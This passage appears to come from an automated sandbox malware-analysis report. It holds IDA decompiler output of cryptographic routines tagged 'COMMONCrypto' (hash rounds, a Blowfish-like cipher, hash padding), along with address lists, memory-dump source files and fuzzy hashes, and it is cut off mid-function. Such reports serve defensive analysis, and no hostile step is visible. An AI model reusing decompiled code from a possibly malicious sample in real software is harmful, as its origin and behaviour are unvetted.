				_t633 = (_t593 ^ _t546 ^ _t234) +  *((intOrPtr*)(_t713 + 0x50)) + _t425 + 0x1fa27cf8 + _t593;
				asm("ror ecx, 0x9");
				_t548 = (_t593 ^ _t633 ^ _t234) +  *((intOrPtr*)(_t713 + 0x1c)) + _t546 - 0x3b53a99b + _t633;
				asm("rol eax, 0x6");
				_t236 = (( !_t593 | _t548) ^ _t633) +  *((intOrPtr*)(_t713 + 0x14)) + _t234 - 0xbd6ddbc + _t548;
				asm("rol edx, 0xa");
				_t595 = (( !_t633 | _t236) ^ _t548) +  *((intOrPtr*)(_t713 + 0x30)) + _t593 + 0x432aff97 + _t236;
				asm("rol esi, 0xf");
				_t635 = (( !_t548 | _t595) ^ _t236) +  *((intOrPtr*)(_t713 + 0x4c)) + _t633 - 0x546bdc59 + _t595;
				asm("ror ecx, 0xb");
				_t550 = (( !_t236 | _t635) ^ _t595) +  *((intOrPtr*)(_t713 + 0x28)) + _t548 - 0x36c5fc7 + _t635;
				asm("rol eax, 0x6");
				_t238 = (( !_t595 | _t550) ^ _t635) +  *((intOrPtr*)(_t713 + 0x44)) + _t236 + 0x655b59c3 + _t550;
				asm("rol edx, 0xa");
				_t597 = (( !_t635 | _t238) ^ _t550) +  *((intOrPtr*)(_t713 + 0x20)) + _t595 - 0x70f3336e + _t238;
				asm("rol esi, 0xf");
				_t637 = (( !_t550 | _t597) ^ _t238) +  *((intOrPtr*)(_t713 + 0x3c)) + _t635 - 0x100b83 + _t597;
				asm("ror ecx, 0xb");
				_t552 = (( !_t238 | _t637) ^ _t597) +  *((intOrPtr*)(_t713 + 0x18)) + _t550 - 0x7a7ba22f + _t637;
				asm("rol eax, 0x6");
				_t240 = (( !_t597 | _t552) ^ _t637) +  *((intOrPtr*)(_t713 + 0x34)) + _t238 + 0x6fa87e4f + _t552;
				asm("rol edx, 0xa");
				_t599 = (( !_t637 | _t240) ^ _t552) +  *((intOrPtr*)(_t713 + 0x50)) + _t597 - 0x1d31920 + _t240;
				asm("rol esi, 0xf");
				_t639 = (( !_t552 | _t599) ^ _t240) +  *((intOrPtr*)(_t713 + 0x2c)) + _t637 - 0x5cfebcec + _t599;
				asm("ror ecx, 0xb");
				_t554 = (( !_t240 | _t639) ^ _t599) +  *((intOrPtr*)(_t713 + 0x48)) + _t552 + 0x4e0811a1 + _t639;
				asm("rol eax, 0x6");
				_t242 = (( !_t599 | _t554) ^ _t639) +  *((intOrPtr*)(_t713 + 0x24)) + _t240 - 0x8ac817e + _t554;
				asm("rol edx, 0xa");
				_t601 = (( !_t639 | _t242) ^ _t554) +  *((intOrPtr*)(_t713 + 0x40)) + _t599 - 0x42c50dcb + _t242;
				asm("rol esi, 0xf");
				_t641 = (( !_t554 | _t601) ^ _t242) +  *((intOrPtr*)(_t713 + 0x1c)) + _t639 + 0x2ad7d2bb + _t601;
				 *__edi =  *__edi + _t242;
				asm("ror eax, 0xb");
				 *(__edi + 4) = (( !_t242 | _t641) ^ _t601) +  *((intOrPtr*)(_t713 + 0x38)) + _t554 - 0x14792c6f +  *(__edi + 4) + _t641;
				 *(__edi + 8) =  *(__edi + 8) + _t641;
				_t253 =  *(__edi + 0xc) + _t601;
				 *(__edi + 0xc) = _t253;
				return _t253;
			}













































































                                                                                                                                                                                          0x00c830c4
                                                                                                                                                                                          0x00c830c8
                                                                                                                                                                                          0x00c830cc
                                                                                                                                                                                          0x00c830d3
                                                                                                                                                                                          0x00c830f3
                                                                                                                                                                                          0x00c830f6
                                                                                                                                                                                          0x00c8310f
                                                                                                                                                                                          0x00c83112
                                                                                                                                                                                          0x00c8312d
                                                                                                                                                                                          0x00c83130
                                                                                                                                                                                          0x00c83149
                                                                                                                                                                                          0x00c8314c
                                                                                                                                                                                          0x00c83165
                                                                                                                                                                                          0x00c83168
                                                                                                                                                                                          0x00c8317f
                                                                                                                                                                                          0x00c83182
                                                                                                                                                                                          0x00c8319b
                                                                                                                                                                                          0x00c8319e
                                                                                                                                                                                          0x00c831b9
                                                                                                                                                                                          0x00c831bc
                                                                                                                                                                                          0x00c831d5
                                                                                                                                                                                          0x00c831d8
                                                                                                                                                                                          0x00c831ef
                                                                                                                                                                                          0x00c831f2
                                                                                                                                                                                          0x00c8320d
                                                                                                                                                                                          0x00c83210
                                                                                                                                                                                          0x00c83229
                                                                                                                                                                                          0x00c8322c
                                                                                                                                                                                          0x00c83245
                                                                                                                                                                                          0x00c83248
                                                                                                                                                                                          0x00c8325f
                                                                                                                                                                                          0x00c83262
                                                                                                                                                                                          0x00c83266
                                                                                                                                                                                          0x00c83268
                                                                                                                                                                                          0x00c8327f
                                                                                                                                                                                          0x00c83282
                                                                                                                                                                                          0x00c83286
                                                                                                                                                                                          0x00c83288
                                                                                                                                                                                          0x00c832a7
                                                                                                                                                                                          0x00c832aa
                                                                                                                                                                                          0x00c832c3
                                                                                                                                                                                          0x00c832c6
                                                                                                                                                                                          0x00c832d7
                                                                                                                                                                                          0x00c832da
                                                                                                                                                                                          0x00c832f3
                                                                                                                                                                                          0x00c832f6
                                                                                                                                                                                          0x00c83311
                                                                                                                                                                                          0x00c83314
                                                                                                                                                                                          0x00c8332d
                                                                                                                                                                                          0x00c83330
                                                                                                                                                                                          0x00c83347
                                                                                                                                                                                          0x00c8334a
                                                                                                                                                                                          0x00c83363
                                                                                                                                                                                          0x00c8336a
                                                                                                                                                                                          0x00c83381
                                                                                                                                                                                          0x00c83384
                                                                                                                                                                                          0x00c8339d
                                                                                                                                                                                          0x00c833a0
                                                                                                                                                                                          0x00c833b7
                                                                                                                                                                                          0x00c833ba
                                                                                                                                                                                          0x00c833d3
                                                                                                                                                                                          0x00c833d6
                                                                                                                                                                                          0x00c833f1
                                                                                                                                                                                          0x00c833f4
                                                                                                                                                                                          0x00c8340d
                                                                                                                                                                                          0x00c83410
                                                                                                                                                                                          0x00c83427
                                                                                                                                                                                          0x00c8342a
                                                                                                                                                                                          0x00c83443
                                                                                                                                                                                          0x00c83448
                                                                                                                                                                                          0x00c8345f
                                                                                                                                                                                          0x00c83462
                                                                                                                                                                                          0x00c83475
                                                                                                                                                                                          0x00c83478
                                                                                                                                                                                          0x00c8348b
                                                                                                                                                                                          0x00c8348e
                                                                                                                                                                                          0x00c834a3
                                                                                                                                                                                          0x00c834a6
                                                                                                                                                                                          0x00c834a8
                                                                                                                                                                                          0x00c834b9
                                                                                                                                                                                          0x00c834bc
                                                                                                                                                                                          0x00c834cf
                                                                                                                                                                                          0x00c834d2
                                                                                                                                                                                          0x00c834e1
                                                                                                                                                                                          0x00c834e4
                                                                                                                                                                                          0x00c834f7
                                                                                                                                                                                          0x00c834fa
                                                                                                                                                                                          0x00c834fe
                                                                                                                                                                                          0x00c8350f
                                                                                                                                                                                          0x00c83512
                                                                                                                                                                                          0x00c83521
                                                                                                                                                                                          0x00c83524
                                                                                                                                                                                          0x00c83537
                                                                                                                                                                                          0x00c8353a
                                                                                                                                                                                          0x00c8354d
                                                                                                                                                                                          0x00c83550
                                                                                                                                                                                          0x00c83554
                                                                                                                                                                                          0x00c83565
                                                                                                                                                                                          0x00c83568
                                                                                                                                                                                          0x00c8357b
                                                                                                                                                                                          0x00c8357e
                                                                                                                                                                                          0x00c8358d
                                                                                                                                                                                          0x00c83590
                                                                                                                                                                                          0x00c835a3
                                                                                                                                                                                          0x00c835a6
                                                                                                                                                                                          0x00c835b9
                                                                                                                                                                                          0x00c835bc
                                                                                                                                                                                          0x00c835d1
                                                                                                                                                                                          0x00c835d4
                                                                                                                                                                                          0x00c835e9
                                                                                                                                                                                          0x00c835ec
                                                                                                                                                                                          0x00c83601
                                                                                                                                                                                          0x00c83604
                                                                                                                                                                                          0x00c83619
                                                                                                                                                                                          0x00c8361c
                                                                                                                                                                                          0x00c83631
                                                                                                                                                                                          0x00c83638
                                                                                                                                                                                          0x00c83649
                                                                                                                                                                                          0x00c8364c
                                                                                                                                                                                          0x00c83661
                                                                                                                                                                                          0x00c83664
                                                                                                                                                                                          0x00c83679
                                                                                                                                                                                          0x00c8367c
                                                                                                                                                                                          0x00c83691
                                                                                                                                                                                          0x00c83694
                                                                                                                                                                                          0x00c836a9
                                                                                                                                                                                          0x00c836ac
                                                                                                                                                                                          0x00c836c5
                                                                                                                                                                                          0x00c836c8
                                                                                                                                                                                          0x00c836d9
                                                                                                                                                                                          0x00c836dc
                                                                                                                                                                                          0x00c836f1
                                                                                                                                                                                          0x00c836f4
                                                                                                                                                                                          0x00c83709
                                                                                                                                                                                          0x00c8370c
                                                                                                                                                                                          0x00c83725
                                                                                                                                                                                          0x00c8372a
                                                                                                                                                                                          0x00c83734
                                                                                                                                                                                          0x00c8373d
                                                                                                                                                                                          0x00c83745
                                                                                                                                                                                          0x00c8374d
                                                                                                                                                                                          0x00c83754
                                                                                                                                                                                          0x00c83757
                                                                                                                                                                                          0x00c8375e

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b439e512d2f2274f2d51447746bdfa11f260257c9624696f8b482fc4d82d582e
                                                                                                                                                                                          • Instruction ID: ec2831ab7648790155aa30ca7cba3e9ca74bb3159083d504f702da44825ccfef
                                                                                                                                                                                          • Opcode Fuzzy Hash: b439e512d2f2274f2d51447746bdfa11f260257c9624696f8b482fc4d82d582e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B312C5BBB983194FDB48CEE5DCC169573E1FB98304F09A43C9A55C7306F6E8AA094790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CA1271 Relevance: .3, Instructions: 254COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CA1271(void* __ecx, signed int* _a4) {
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t352;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int* _t459;

				_t352 = __ecx;
				_t1 = _t352 + 0x10; // 0x2a002a00
				_t459 = _a4;
				_t356 =  *_t1 ^  *_t459;
				_t4 = (_t356 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t7 = (_t356 >> 0x18) * 4; // 0x49000000
				_t10 = (_t356 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t13 = (_t356 & 0x000000ff) * 4; // 0x46000000
				_t15 = _t352 + 0x14; // 0x2a002a00
				_t222 = ( *((intOrPtr*)(__ecx + _t4 + 0x458)) +  *((intOrPtr*)(__ecx + _t7 + 0x58)) ^  *(__ecx + _t10 + 0x858)) +  *((intOrPtr*)(__ecx + _t13 + 0xc58)) ^  *_t15 ^ _t459[1];
				_t18 = (_t222 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t21 = (_t222 >> 0x18) * 4; // 0x49000000
				_t24 = (_t222 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t27 = (_t222 & 0x000000ff) * 4; // 0x46000000
				_t29 = _t352 + 0x18; // 0x20002a00
				_t357 = _t356 ^ ( *((intOrPtr*)(__ecx + _t18 + 0x458)) +  *((intOrPtr*)(__ecx + _t21 + 0x58)) ^  *(__ecx + _t24 + 0x858)) +  *((intOrPtr*)(__ecx + _t27 + 0xc58)) ^  *_t29;
				_t31 = (_t357 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t34 = (_t357 >> 0x18) * 4; // 0x49000000
				_t37 = (_t357 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t40 = (_t357 & 0x000000ff) * 4; // 0x46000000
				_t42 = _t352 + 0x1c; // 0x83517600
				_t223 = _t222 ^ ( *((intOrPtr*)(__ecx + _t31 + 0x458)) +  *((intOrPtr*)(__ecx + _t34 + 0x58)) ^  *(__ecx + _t37 + 0x858)) +  *((intOrPtr*)(__ecx + _t40 + 0xc58)) ^  *_t42;
				_t44 = (_t223 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t47 = (_t223 >> 0x18) * 4; // 0x49000000
				_t50 = (_t223 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t53 = (_t223 & 0x000000ff) * 4; // 0x46000000
				_t55 = _t352 + 0x20; // 0xef95195b
				_t358 = _t357 ^ ( *((intOrPtr*)(__ecx + _t44 + 0x458)) +  *((intOrPtr*)(__ecx + _t47 + 0x58)) ^  *(__ecx + _t50 + 0x858)) +  *((intOrPtr*)(__ecx + _t53 + 0xc58)) ^  *_t55;
				_t57 = (_t358 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t60 = (_t358 >> 0x18) * 4; // 0x49000000
				_t63 = (_t358 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t66 = (_t358 & 0x000000ff) * 4; // 0x46000000
				_t68 = _t352 + 0x24; // 0x2a00208b
				_t224 = _t223 ^ ( *((intOrPtr*)(__ecx + _t57 + 0x458)) +  *((intOrPtr*)(__ecx + _t60 + 0x58)) ^  *(__ecx + _t63 + 0x858)) +  *((intOrPtr*)(__ecx + _t66 + 0xc58)) ^  *_t68;
				_t70 = (_t224 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t73 = (_t224 >> 0x18) * 4; // 0x49000000
				_t76 = (_t224 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t79 = (_t224 & 0x000000ff) * 4; // 0x46000000
				_t81 = _t352 + 0x28; // 0x2a002a00
				_t359 = _t358 ^ ( *((intOrPtr*)(__ecx + _t70 + 0x458)) +  *((intOrPtr*)(__ecx + _t73 + 0x58)) ^  *(__ecx + _t76 + 0x858)) +  *((intOrPtr*)(__ecx + _t79 + 0xc58)) ^  *_t81;
				_t83 = (_t359 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t86 = (_t359 >> 0x18) * 4; // 0x49000000
				_t89 = (_t359 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t92 = (_t359 & 0x000000ff) * 4; // 0x46000000
				_t94 = _t352 + 0x2c; // 0x2a002a00
				_t225 = _t224 ^ ( *((intOrPtr*)(__ecx + _t83 + 0x458)) +  *((intOrPtr*)(__ecx + _t86 + 0x58)) ^  *(__ecx + _t89 + 0x858)) +  *((intOrPtr*)(__ecx + _t92 + 0xc58)) ^  *_t94;
				_t96 = (_t225 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t99 = (_t225 >> 0x18) * 4; // 0x49000000
				_t102 = (_t225 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t105 = (_t225 & 0x000000ff) * 4; // 0x46000000
				_t107 = _t352 + 0x30; // 0xa002a00
				_t360 = _t359 ^ ( *((intOrPtr*)(__ecx + _t96 + 0x458)) +  *((intOrPtr*)(__ecx + _t99 + 0x58)) ^  *(__ecx + _t102 + 0x858)) +  *((intOrPtr*)(__ecx + _t105 + 0xc58)) ^  *_t107;
				_t109 = (_t360 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t112 = (_t360 >> 0x18) * 4; // 0x49000000
				_t115 = (_t360 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t118 = (_t360 & 0x000000ff) * 4; // 0x46000000
				_t120 = _t352 + 0x34; // 0x52000000
				_t226 = _t225 ^ ( *((intOrPtr*)(__ecx + _t109 + 0x458)) +  *((intOrPtr*)(__ecx + _t112 + 0x58)) ^  *(__ecx + _t115 + 0x858)) +  *((intOrPtr*)(__ecx + _t118 + 0xc58)) ^  *_t120;
				_t122 = (_t226 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t125 = (_t226 >> 0x18) * 4; // 0x49000000
				_t128 = (_t226 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t131 = (_t226 & 0x000000ff) * 4; // 0x46000000
				_t133 = _t352 + 0x38; // 0x726f7065
				_t361 = _t360 ^ ( *((intOrPtr*)(__ecx + _t122 + 0x458)) +  *((intOrPtr*)(__ecx + _t125 + 0x58)) ^  *(__ecx + _t128 + 0x858)) +  *((intOrPtr*)(__ecx + _t131 + 0xc58)) ^  *_t133;
				_t135 = (_t361 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t138 = (_t361 >> 0x18) * 4; // 0x49000000
				_t141 = (_t361 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t144 = (_t361 & 0x000000ff) * 4; // 0x46000000
				_t146 = _t352 + 0x3c; // 0x35445f74
				_t227 = _t226 ^ ( *((intOrPtr*)(__ecx + _t135 + 0x458)) +  *((intOrPtr*)(__ecx + _t138 + 0x58)) ^  *(__ecx + _t141 + 0x858)) +  *((intOrPtr*)(__ecx + _t144 + 0xc58)) ^  *_t146;
				_t148 = (_t227 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t151 = (_t227 >> 0x18) * 4; // 0x49000000
				_t154 = (_t227 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t157 = (_t227 & 0x000000ff) * 4; // 0x46000000
				_t159 = _t352 + 0x40; // 0x64000053
				_t362 = _t361 ^ ( *((intOrPtr*)(__ecx + _t148 + 0x458)) +  *((intOrPtr*)(__ecx + _t151 + 0x58)) ^  *(__ecx + _t154 + 0x858)) +  *((intOrPtr*)(__ecx + _t157 + 0xc58)) ^  *_t159;
				_t161 = (_t362 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t164 = (_t362 >> 0x18) * 4; // 0x49000000
				_t167 = (_t362 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t170 = (_t362 & 0x000000ff) * 4; // 0x46000000
				_t172 = _t352 + 0x44; // 0x3530356f
				_t228 = _t227 ^ ( *((intOrPtr*)(__ecx + _t161 + 0x458)) +  *((intOrPtr*)(__ecx + _t164 + 0x58)) ^  *(__ecx + _t167 + 0x858)) +  *((intOrPtr*)(__ecx + _t170 + 0xc58)) ^  *_t172;
				_t174 = (_t228 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t177 = (_t228 >> 0x18) * 4; // 0x49000000
				_t180 = (_t228 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t183 = (_t228 & 0x000000ff) * 4; // 0x46000000
				_t185 = _t352 + 0x48; // 0x42000000
				_t363 = _t362 ^ ( *((intOrPtr*)(__ecx + _t174 + 0x458)) +  *((intOrPtr*)(__ecx + _t177 + 0x58)) ^  *(__ecx + _t180 + 0x858)) +  *((intOrPtr*)(__ecx + _t183 + 0xc58)) ^  *_t185;
				_t187 = (_t363 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t190 = (_t363 >> 0x18) * 4; // 0x49000000
				_t193 = (_t363 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t196 = (_t363 & 0x000000ff) * 4; // 0x46000000
				_t198 = _t352 + 0x4c; // 0x73776f72
				_t229 = _t228 ^ ( *((intOrPtr*)(__ecx + _t187 + 0x458)) +  *((intOrPtr*)(__ecx + _t190 + 0x58)) ^  *(__ecx + _t193 + 0x858)) +  *((intOrPtr*)(__ecx + _t196 + 0xc58)) ^  *_t198;
				_t200 = (_t229 >> 0x00000010 & 0x000000ff) * 4; // 0x0
				_t203 = (_t229 >> 0x18) * 4; // 0x49000000
				_t206 = (_t229 >> 0x00000008 & 0x000000ff) * 4; // 0x6b636f
				_t209 = (_t229 & 0x000000ff) * 4; // 0x46000000
				_t211 = _t352 + 0x50; // 0x614c7265
				_t212 = _t352 + 0x54; // 0x68636e75
				 *_t459 =  *_t212 ^ _t229;
				_t459[1] = _t363 ^ ( *((intOrPtr*)(__ecx + _t200 + 0x458)) +  *((intOrPtr*)(__ecx + _t203 + 0x58)) ^  *(__ecx + _t206 + 0x858)) +  *((intOrPtr*)(__ecx + _t209 + 0xc58)) ^  *_t211;
				return _t229;
			}





















                                                                                                                                                                                          0x00ca1271
                                                                                                                                                                                          0x00ca1272
                                                                                                                                                                                          0x00ca1276
                                                                                                                                                                                          0x00ca127a
                                                                                                                                                                                          0x00ca1285
                                                                                                                                                                                          0x00ca1291
                                                                                                                                                                                          0x00ca129d
                                                                                                                                                                                          0x00ca12a7
                                                                                                                                                                                          0x00ca12ae
                                                                                                                                                                                          0x00ca12b1
                                                                                                                                                                                          0x00ca12bc
                                                                                                                                                                                          0x00ca12c8
                                                                                                                                                                                          0x00ca12d4
                                                                                                                                                                                          0x00ca12de
                                                                                                                                                                                          0x00ca12e5
                                                                                                                                                                                          0x00ca12e8
                                                                                                                                                                                          0x00ca12f2
                                                                                                                                                                                          0x00ca12fe
                                                                                                                                                                                          0x00ca130a
                                                                                                                                                                                          0x00ca1314
                                                                                                                                                                                          0x00ca131b
                                                                                                                                                                                          0x00ca131e
                                                                                                                                                                                          0x00ca1328
                                                                                                                                                                                          0x00ca1334
                                                                                                                                                                                          0x00ca1340
                                                                                                                                                                                          0x00ca134a
                                                                                                                                                                                          0x00ca1351
                                                                                                                                                                                          0x00ca1354
                                                                                                                                                                                          0x00ca135e
                                                                                                                                                                                          0x00ca136a
                                                                                                                                                                                          0x00ca1376
                                                                                                                                                                                          0x00ca1380
                                                                                                                                                                                          0x00ca1387
                                                                                                                                                                                          0x00ca138a
                                                                                                                                                                                          0x00ca1394
                                                                                                                                                                                          0x00ca13a0
                                                                                                                                                                                          0x00ca13ac
                                                                                                                                                                                          0x00ca13b6
                                                                                                                                                                                          0x00ca13bd
                                                                                                                                                                                          0x00ca13c0
                                                                                                                                                                                          0x00ca13ca
                                                                                                                                                                                          0x00ca13d6
                                                                                                                                                                                          0x00ca13e2
                                                                                                                                                                                          0x00ca13ec
                                                                                                                                                                                          0x00ca13f3
                                                                                                                                                                                          0x00ca13f6
                                                                                                                                                                                          0x00ca1400
                                                                                                                                                                                          0x00ca140c
                                                                                                                                                                                          0x00ca1418
                                                                                                                                                                                          0x00ca1422
                                                                                                                                                                                          0x00ca1429
                                                                                                                                                                                          0x00ca142c
                                                                                                                                                                                          0x00ca1436
                                                                                                                                                                                          0x00ca1442
                                                                                                                                                                                          0x00ca144e
                                                                                                                                                                                          0x00ca1458
                                                                                                                                                                                          0x00ca145f
                                                                                                                                                                                          0x00ca1462
                                                                                                                                                                                          0x00ca146c
                                                                                                                                                                                          0x00ca1478
                                                                                                                                                                                          0x00ca1484
                                                                                                                                                                                          0x00ca148e
                                                                                                                                                                                          0x00ca1495
                                                                                                                                                                                          0x00ca1498
                                                                                                                                                                                          0x00ca14a2
                                                                                                                                                                                          0x00ca14ae
                                                                                                                                                                                          0x00ca14ba
                                                                                                                                                                                          0x00ca14c4
                                                                                                                                                                                          0x00ca14cb
                                                                                                                                                                                          0x00ca14ce
                                                                                                                                                                                          0x00ca14d8
                                                                                                                                                                                          0x00ca14e4
                                                                                                                                                                                          0x00ca14f0
                                                                                                                                                                                          0x00ca14fa
                                                                                                                                                                                          0x00ca1501
                                                                                                                                                                                          0x00ca1504
                                                                                                                                                                                          0x00ca150e
                                                                                                                                                                                          0x00ca151a
                                                                                                                                                                                          0x00ca1526
                                                                                                                                                                                          0x00ca1530
                                                                                                                                                                                          0x00ca1537
                                                                                                                                                                                          0x00ca153a
                                                                                                                                                                                          0x00ca1544
                                                                                                                                                                                          0x00ca1550
                                                                                                                                                                                          0x00ca155c
                                                                                                                                                                                          0x00ca1566
                                                                                                                                                                                          0x00ca156d
                                                                                                                                                                                          0x00ca1570
                                                                                                                                                                                          0x00ca157a
                                                                                                                                                                                          0x00ca1586
                                                                                                                                                                                          0x00ca1592
                                                                                                                                                                                          0x00ca159c
                                                                                                                                                                                          0x00ca15a3
                                                                                                                                                                                          0x00ca15a6
                                                                                                                                                                                          0x00ca15b0
                                                                                                                                                                                          0x00ca15bc
                                                                                                                                                                                          0x00ca15c8
                                                                                                                                                                                          0x00ca15d2
                                                                                                                                                                                          0x00ca15d9
                                                                                                                                                                                          0x00ca15dc
                                                                                                                                                                                          0x00ca15e4
                                                                                                                                                                                          0x00ca15e6
                                                                                                                                                                                          0x00ca15eb

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3721793624401e5da5e37cb124d5ae248198b71738af5317943dc8e78dc34914
                                                                                                                                                                                          • Instruction ID: 3cb871dfd56cb31c51bb604d86e7037694e927d1ca1f5b7c28c46751e8636e8b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3721793624401e5da5e37cb124d5ae248198b71738af5317943dc8e78dc34914
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B187F6A0075287D3518E6A5CC014133E3ABCC22EFAB455ADB406F793DA7974ABC6D0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C874F0 Relevance: .2, Instructions: 183COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C874F0(char* __eax, signed char* __edi) {
				unsigned int _t116;
				unsigned int _t117;
				unsigned int _t118;
				unsigned int _t119;
				unsigned int _t120;
				unsigned int _t121;
				unsigned int _t122;
				signed int _t140;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed char* _t193;
				char* _t194;
				char* _t197;
				void* _t198;
				char* _t200;
				void* _t201;
				void* _t202;
				char* _t204;
				char* _t205;
				char* _t206;
				char* _t207;
				char* _t209;
				void* _t210;
				char* _t213;
				void* _t214;
				char* _t216;
				void* _t217;
				void* _t218;
				char* _t220;
				void* _t221;
				void* _t222;
				char* _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				void* _t229;

				_t193 = __edi;
				_t140 = __edi[0x20];
				_t194 = __eax;
				_t116 = (__edi[0x24] << 0x00000020 | _t140) << 3;
				_t226 = __edi[0x20] & 0x0000003f;
				__edi[_t226 + 0x28] = 0x80;
				_t227 = _t226 + 1;
				_t143 = _t140 + _t140 + _t140 + _t140 + _t140 + _t140 + _t140 + _t140;
				 *(_t229 + 0x10) = _t116;
				while(_t227 != 0x38) {
					_t228 = _t227 & 0x0000003f;
					if(_t228 == 0) {
						E00C873F0(_t193);
						_t116 =  *(_t229 + 0x10);
					}
					_t193[_t228 + 0x28] = 0;
					_t227 = _t228 + 1;
				}
				_t117 = (_t116 << 0x00000020 | _t143) << 8;
				_t144 = _t143 << 8;
				_t118 = (_t117 << 0x00000020 | _t144) << 8;
				_t193[_t227 + 0x28] = _t116 >> 0x18;
				_t145 = _t144 << 8;
				_t119 = (_t118 << 0x00000020 | _t145) << 8;
				_t193[_t227 + 0x29] = _t117 >> 0x18;
